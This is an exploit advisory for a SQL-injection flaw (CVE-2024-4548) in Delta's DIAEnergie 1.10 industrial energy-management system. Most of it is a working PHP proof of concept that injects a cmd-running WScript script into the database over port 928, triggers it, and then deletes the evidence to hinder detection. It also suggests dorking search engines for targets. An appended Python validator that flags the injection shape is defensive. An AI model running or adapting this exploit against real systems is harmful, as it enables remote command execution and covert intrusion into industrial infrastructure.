DIAEnergie 1.10 SQL Injection
=============================================================================================================================================
| # Title : DIAEnergie 1.10 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: The code attempts to establish a network connection to the targeted server.

If the connection succeeds, it sends a malicious SQL query to inject commands into the database.

After the injection, the script cleans up the database to make the attack harder to detect.

( https://packetstorm.news/files/id/180334/ CVE-2024-4548 )

[+] save code as poc.php.

[+] Set Target : line 114

[+] Usage : php poc.php

[+] Payload :

<?php

class CustomSQLInjection
{
    const TARGET_PORT = 928;
    const TARGET_HOST = 'target_host'; // set the target host here

    private $payload;

    public function __construct($cmd)
    {
        // Build the script body that will be stored in DIAE_script
        $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
    }

    public function check()
    {
        try {
            $sock = $this->connect();
            fwrite($sock, 'Who is it?');
            $res = fread($sock, 1024);

            if (empty($res)) {
                echo "Received an empty response.\n";
                return 'Unknown';
            }

            echo "Who is it response: $res\n";

            preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);

            if (empty($version)) {
                return 'Detected';
            }

            echo "Version retrieved: " . $version[0] . "\n";

            if (version_compare($version[0], '1.10.1.8610', '>')) {
                return 'Safe';
            }

            return 'Appears';

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            return 'Unknown';
        }
    }

    public function exploit()
    {
        // Run the injection with the prepared payload
        $this->execute_command($this->payload);
    }

    private function execute_command($cmd)
    {
        $scname = bin2hex(random_bytes(rand(5, 10)));

        echo "Using random script name: $scname\n";

        // Random YYYY-MM-DD date (the original used date() on a year value, which always yields 1970-01-01)
        $random_date = sprintf('%04d-%02d-%02d', rand(2024, 2026), rand(1, 12), rand(1, 29));
        echo "Using random date: $random_date\n";

        $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
        echo "Using random time: $random_time\n";

        try {
            echo "Sending SQL injection...\n";

            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Injection - Expected response received: $res\n";

            fclose($sock);

            // Trigger the script execution
            echo "Triggering script execution...\n";
            $sock = $this->connect();
            fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
            $res = fread($sock, 1024);

            if ($res !== 'Recalculate Script Start!') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Trigger - Expected response received: $res\n";

            fclose($sock);

            echo "Script successfully injected, check thy shell.\n";

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            $this->cleanup($scname);
        }
    }

    private function cleanup($scname)
    {
        echo "Cleaning up database...\n";
        try {
            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Cleanup - Expected response received: $res\n";
            fclose($sock);

        } catch (Exception $e) {
            echo "Error during cleanup: " . $e->getMessage() . "\n";
        }
    }

    private function connect()
    {
        // Open a plain TCP socket to the service with fsockopen (10 second timeout)
        $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
        if (!$sock) {
            throw new Exception("Connection failed: $errstr ($errno)");
        }
        return $sock;
    }
}

// Command passed into the payload
$cmd = 'dir';
$exploit = new CustomSQLInjection($cmd);
$exploit->check();
$exploit->exploit();

?>
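The PoC above works because the service splices the '~'-separated date fields of a RecalculateHDMWYC request straight into SQL. As an added example that is not part of the original advisory, the following Python snippet shows the defender-side check: a strict grammar validator for that message shape (assumed to be COMMAND~start~end~flag with the two commands the PoC uses) run over constructed captured messages, flagging anything that does not parse and noting SQL metacharacters. The real fix belongs in the service (parameterised queries); this only detects or filters the malformed traffic.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Message shape taken from the PoC: COMMAND~start~end~flag, fields joined by '~'.
# The command allowlist is an assumption limited to the two commands the PoC exercises.
ALLOWED_COMMANDS = {"RecalculateHDMWYC", "RecalculateScript"}
TIMESTAMP_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")
SQL_META_RE = re.compile(r"[;'\"]|--|/\*|\b(insert|delete|update|drop|exec)\b", re.IGNORECASE)

@dataclass
class Verdict:
    ok: bool
    reason: str
    command: Optional[str] = None

def validate_message(msg: str) -> Verdict:
    """Strictly validate one service message; anything outside the expected grammar is rejected."""
    parts = msg.split("~")
    if len(parts) != 4:
        return Verdict(False, f"expected 4 '~'-separated fields, got {len(parts)}")
    cmd, start, end, flag = parts
    if cmd not in ALLOWED_COMMANDS:
        return Verdict(False, f"unknown command {cmd!r}")
    for label, ts in (("start", start), ("end", end)):
        if not TIMESTAMP_RE.match(ts):
            return Verdict(False, f"{label} timestamp not YYYY-MM-DD HH:MM:SS: {ts!r}", cmd)
    if not flag.isdigit():
        return Verdict(False, f"trailing field is not an integer: {flag!r}", cmd)
    return Verdict(True, "well-formed", cmd)

def scan(messages: List[str]) -> List[str]:
    """Return one alert string per message that fails validation, noting SQL metacharacters."""
    alerts = []
    for msg in messages:
        verdict = validate_message(msg)
        if not verdict.ok:
            hint = " (contains SQL metacharacters)" if SQL_META_RE.search(msg) else ""
            alerts.append(f"{verdict.reason}{hint}")
    return alerts

# Constructed sample traffic: a benign request, the injection shape used by the PoC's cleanup
# step (with a placeholder script name), and a merely malformed request.
SAMPLE_MESSAGES = [
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='PLACEHOLDER';--",
    "RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~abc",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_MESSAGES):
        print("ALERT:", alert)
```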

===================================================================================================
| Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
===================================================================================================